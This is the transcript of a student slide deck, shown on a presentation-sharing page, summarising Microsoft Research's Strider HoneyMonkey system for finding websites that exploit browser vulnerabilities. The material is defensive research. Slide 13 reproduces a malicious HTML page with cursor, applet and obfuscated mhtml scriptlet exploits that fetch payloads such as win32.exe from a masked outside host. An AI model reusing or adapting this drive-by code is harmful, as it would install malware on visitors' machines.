1 / 26

Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser

Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities. AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev, Chad Verbowski, Shuo Chen, and Sam King PUBLISHED IN: MICROSOFT RESEARCH ,Redmond. PROPOSED PROBLEM.

alexandra-brennan
Download Presentation

Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev, Chad Verbowski, Shuo Chen, and Sam King PUBLISHED IN: MICROSOFT RESEARCH ,Redmond

  2. PROPOSED PROBLEM • EMERGING ATTACK : INTERNET • ATTACKS BY MALICIOUS WEBSITE • EXPLOIT BROWSER VULNERABILITIES • INSTALL MALICIOUS CONTENTS • USE OF HONEYMONKEYS FOR SOLUTION

  3. BROWSER BASED VULNERABILITY Code Obfuscation URL redirection Vulnerability exploitation Malware installation

  4. CODE OBFUSCATION

  5. CODE OBFUSCATION • To escape from signature based scanning • Custom decoding routine included inside the script • Unreadable long strings that are encoded and decoded later by the script or by the browser

  6. ENCODED MALICIOUS CODE

  7. DECODED MALICIOUS CODE

  8. URL REDIRECTION

  9. URL REDIRECTION • PRIMARY URL TO SECONDARY URL • PROTOCOL REDIRECTION USING HTTP 302 TEMPORARY REDIRECT • HTML TAGS • Script functions including window.location.replace().

  10. URL REDIRECTION http://[IP address] /[8 chars]/test2/iejp.htm http://[IP address] PRIMARY SECONDARY USER

  11. VULNERABILITY EXPLOITATION

  12. VULNERABILITY EXPLOITATION • Malicious Website attempt to exploit multiple vulnerabilities • HTML fragment – multiple files from different URL’S • Dynamic code injection using Document.write • Trojan downloader works after exploits • Most attacked browser is IE

  13. EXAMPLE FOR VULNERABILITY <html><head><title></title></head><body> <style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style> <APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1> <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET> <script> Try{ document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58&#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58;// C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){} </script> </body></html> Exploit 1 Exploit 2 Exploit 3

  14. Honey Monkey Exploit Detection System • Active client side virtual machines called honeypots • Large scale, systematic and automated web patrol • It mimics human browsing • Different patches and different levels of vulnerability

  15. HONEYMONKEY SYSTEM • Stage 1 – scalable mode by visiting N-URLs. • Stage 2 – perform recursive redirected analysis. • Stage 3 – scan exploit URLs using fully patched VMs.

  16. HONEY MONKEY SYSTEM

  17. TOPOLOGY GRAPH AND NODE RANKING • Rectangular nodes represent Exploit URL’s • Arrows represent traffic redirection • Circles represent nodes that act as an aggregation point for exploit pages hosted • R is the most likely exploit provider

  18. TOPOLOGY GRAPH AND NODE RANKING

  19. GENERATING URL LISTS • Generating URL LISTS - Suspicious URL’s - Popular websites – if attacked potentially attack larger population - Localized space websites

  20. Exploit Detection Report • Executable files created or modified outside the browser sandbox folders • Processes created • Windows registry entry created or modified • Vulnerability exploited • Redirect URL visited

  21. Patch level statistics

  22. RESULTS

  23. ADVANTAGES • Automatic • Scalable • Non-signature based approach • Stage-wise detection

  24. DISADVANTGES • Exploiters may randomize the attack confusing the honey monkeys • Exploiters were able to detect honey monkeys by sending dialog box • They didn’t explain about topology graphs very clearly

  25. IMPROVEMENTS • They need to work on accuracy • They need more classification according • to contents • They should improve on avoiding • detection by the honey monkeys

More Related